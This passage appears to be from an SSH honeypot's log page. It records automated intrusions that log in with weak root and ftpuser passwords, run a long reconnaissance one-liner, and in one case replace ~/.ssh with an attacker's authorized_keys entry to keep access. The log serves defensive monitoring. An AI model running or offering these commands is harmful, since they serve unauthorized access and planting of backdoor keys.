nonproductions.net banner
Logo
Subsystem: NO BONK

Adversarial Observation Interface

Page 35 / 4331 (216547 total records)
Passive Observation Node - Active Operational Overview
195.178.110.228
2026-06-30 01:09:28.973598 UTC
COMMANDS RUN RECONNAISSANCE SUCCESSFUL LOGIN SCORE: 200

Credential acceptance event recorded. Target authentication: root / 123456

Remote entity achieved interactive shell state. Command sequence (9 executed):

[obs-node]:~$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E "model name|Hardware" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep "Model name"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; echo '===DONE===' ) 2>&1 ); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"; echo "FILTER:$filter_output"
[obs-node]:~$ uname -s -v -n -m 2 > /dev/null
[obs-node]:~$ /bin/uname -s -v -n -m 2 > /dev/null
[obs-node]:~$ /usr/bin/uname -s -v -n -m 2 > /dev/null
Command not found: /usr/bin/uname -s -v -n -m
[obs-node]:~$ busybox uname -s -v -n -m 2 > /dev/null
[obs-node]:~$ ( [ -f /proc/version ]
[obs-node]:~$ [ -f /proc/version ]
[obs-node]:~$ head -1 /proc/version | cut -d -f1
[obs-node]:~$ [ -f /etc/os-release ]
Record ID: 598c0a7eb94f
Client Version: SSH-2.0-Go
Engagement Duration: 4.0s
HASSH Fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5
{
  "id": "598c0a7eb94f",
  "src_ip": "195.178.110.228",
  "start_time": "2026-06-30T01:09:28.973598Z",
  "end_time": "2026-06-30T01:09:33.010731Z",
  "duration": "4.0",
  "version": "SSH-2.0-Go",
  "hassh": "2ec37a7cc8daf20b10e1ad6221061ca5",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "123456"
  },
  "commands": [
    "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
    "uname -s -v -n -m 2 > /dev/null",
    "/bin/uname -s -v -n -m 2 > /dev/null",
    "/usr/bin/uname -s -v -n -m 2 > /dev/null",
    "busybox uname -s -v -n -m 2 > /dev/null",
    "( [ -f /proc/version ]",
    "[ -f /proc/version ]",
    "head -1 /proc/version | cut -d -f1",
    "[ -f /etc/os-release ]"
  ],
  "detailed_commands": [
    {
      "cmd": "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
      "failed": false,
      "error": null
    },
    {
      "cmd": "uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "/bin/uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "/usr/bin/uname -s -v -n -m 2 > /dev/null",
      "failed": true,
      "error": "Command not found: /usr/bin/uname -s -v -n -m"
    },
    {
      "cmd": "busybox uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "( [ -f /proc/version ]",
      "failed": false,
      "error": null
    },
    {
      "cmd": "[ -f /proc/version ]",
      "failed": false,
      "error": null
    },
    {
      "cmd": "head -1 /proc/version | cut -d -f1",
      "failed": false,
      "error": null
    },
    {
      "cmd": "[ -f /etc/os-release ]",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "/usr/bin/uname -s -v -n -m"
  ],
  "score": 200,
  "tags": [
    "COMMANDS RUN",
    "RECONNAISSANCE",
    "SUCCESSFUL LOGIN"
  ]
}
47.245.98.98
2026-06-30 01:09:27.328901 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34

Record ID: 7200c945f80e
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 2.1s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "7200c945f80e",
  "src_ip": "47.245.98.98",
  "start_time": "2026-06-30T01:09:27.328901Z",
  "end_time": "2026-06-30T01:09:29.442062Z",
  "duration": "2.1",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "345gs5662d34",
      "pass": "345gs5662d34"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
47.245.98.98
2026-06-30 01:09:24.840207 UTC
COMMANDS RUN SUCCESSFUL LOGIN SCORE: 80

Credential acceptance event recorded. Target authentication: ftpuser / abcd1234

Remote entity achieved interactive shell state. Command sequence (2 executed):

[obs-node]:~$ cd ~; chattr -ia .ssh; lockr -ia .ssh
Command not found: lockr -ia .ssh
[obs-node]:~$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
Record ID: 8f2d1496c1ff
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 5.9s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "8f2d1496c1ff",
  "src_ip": "47.245.98.98",
  "start_time": "2026-06-30T01:09:24.840207Z",
  "end_time": "2026-06-30T01:09:30.771806Z",
  "duration": "5.9",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "ftpuser",
    "pass": "abcd1234"
  },
  "commands": [
    "cd ~; chattr -ia .ssh; lockr -ia .ssh",
    "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
  ],
  "detailed_commands": [
    {
      "cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
      "failed": true,
      "error": "Command not found: lockr -ia .ssh"
    },
    {
      "cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "lockr -ia .ssh"
  ],
  "score": 80,
  "tags": [
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN"
  ]
}
195.178.110.228
2026-06-30 01:07:23.332040 UTC
COMMANDS RUN RECONNAISSANCE SUCCESSFUL LOGIN SCORE: 200

Credential acceptance event recorded. Target authentication: root / 12345

Remote entity achieved interactive shell state. Command sequence (9 executed):

[obs-node]:~$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E "model name|Hardware" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep "Model name"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; echo '===DONE===' ) 2>&1 ); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"; echo "FILTER:$filter_output"
[obs-node]:~$ uname -s -v -n -m 2 > /dev/null
[obs-node]:~$ /bin/uname -s -v -n -m 2 > /dev/null
[obs-node]:~$ /usr/bin/uname -s -v -n -m 2 > /dev/null
Command not found: /usr/bin/uname -s -v -n -m
[obs-node]:~$ busybox uname -s -v -n -m 2 > /dev/null
[obs-node]:~$ ( [ -f /proc/version ]
[obs-node]:~$ [ -f /proc/version ]
[obs-node]:~$ head -1 /proc/version | cut -d -f1
[obs-node]:~$ [ -f /etc/os-release ]
Record ID: b40e4654c003
Client Version: SSH-2.0-Go
Engagement Duration: 3.0s
HASSH Fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5
{
  "id": "b40e4654c003",
  "src_ip": "195.178.110.228",
  "start_time": "2026-06-30T01:07:23.332040Z",
  "end_time": "2026-06-30T01:07:26.316578Z",
  "duration": "3.0",
  "version": "SSH-2.0-Go",
  "hassh": "2ec37a7cc8daf20b10e1ad6221061ca5",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "12345"
  },
  "commands": [
    "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
    "uname -s -v -n -m 2 > /dev/null",
    "/bin/uname -s -v -n -m 2 > /dev/null",
    "/usr/bin/uname -s -v -n -m 2 > /dev/null",
    "busybox uname -s -v -n -m 2 > /dev/null",
    "( [ -f /proc/version ]",
    "[ -f /proc/version ]",
    "head -1 /proc/version | cut -d -f1",
    "[ -f /etc/os-release ]"
  ],
  "detailed_commands": [
    {
      "cmd": "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
      "failed": false,
      "error": null
    },
    {
      "cmd": "uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "/bin/uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "/usr/bin/uname -s -v -n -m 2 > /dev/null",
      "failed": true,
      "error": "Command not found: /usr/bin/uname -s -v -n -m"
    },
    {
      "cmd": "busybox uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "( [ -f /proc/version ]",
      "failed": false,
      "error": null
    },
    {
      "cmd": "[ -f /proc/version ]",
      "failed": false,
      "error": null
    },
    {
      "cmd": "head -1 /proc/version | cut -d -f1",
      "failed": false,
      "error": null
    },
    {
      "cmd": "[ -f /etc/os-release ]",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "/usr/bin/uname -s -v -n -m"
  ],
  "score": 200,
  "tags": [
    "COMMANDS RUN",
    "RECONNAISSANCE",
    "SUCCESSFUL LOGIN"
  ]
}
45.148.10.157
2026-06-30 01:06:39.787697 UTC
SCORE: 0

Autonomous probing activity normalized. Remote entity established connection but deferred authentication.

Record ID: 79965e6a9103
Client Version: SSH-2.0-PUTTY
Engagement Duration: 0.7s
HASSH Fingerprint: 5bd26477da5440a6187bd3f1b39a429c
{
  "id": "79965e6a9103",
  "src_ip": "45.148.10.157",
  "start_time": "2026-06-30T01:06:39.787697Z",
  "end_time": "2026-06-30T01:06:40.538139Z",
  "duration": "0.7",
  "version": "SSH-2.0-PUTTY",
  "hassh": "5bd26477da5440a6187bd3f1b39a429c",
  "attempts": [],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": []
}
195.178.110.228
2026-06-30 01:05:20.048530 UTC
COMMANDS RUN RECONNAISSANCE SUCCESSFUL LOGIN SCORE: 200

Credential acceptance event recorded. Target authentication: root / 1234

Remote entity achieved interactive shell state. Command sequence (9 executed):

[obs-node]:~$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E "model name|Hardware" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep "Model name"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; echo '===DONE===' ) 2>&1 ); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"; echo "FILTER:$filter_output"
[obs-node]:~$ uname -s -v -n -m 2 > /dev/null
[obs-node]:~$ /bin/uname -s -v -n -m 2 > /dev/null
[obs-node]:~$ /usr/bin/uname -s -v -n -m 2 > /dev/null
Command not found: /usr/bin/uname -s -v -n -m
[obs-node]:~$ busybox uname -s -v -n -m 2 > /dev/null
[obs-node]:~$ ( [ -f /proc/version ]
[obs-node]:~$ [ -f /proc/version ]
[obs-node]:~$ head -1 /proc/version | cut -d -f1
[obs-node]:~$ [ -f /etc/os-release ]
Record ID: 38f73e573489
Client Version: SSH-2.0-Go
Engagement Duration: 3.5s
HASSH Fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5
{
  "id": "38f73e573489",
  "src_ip": "195.178.110.228",
  "start_time": "2026-06-30T01:05:20.048530Z",
  "end_time": "2026-06-30T01:05:23.535129Z",
  "duration": "3.5",
  "version": "SSH-2.0-Go",
  "hassh": "2ec37a7cc8daf20b10e1ad6221061ca5",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "1234"
  },
  "commands": [
    "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 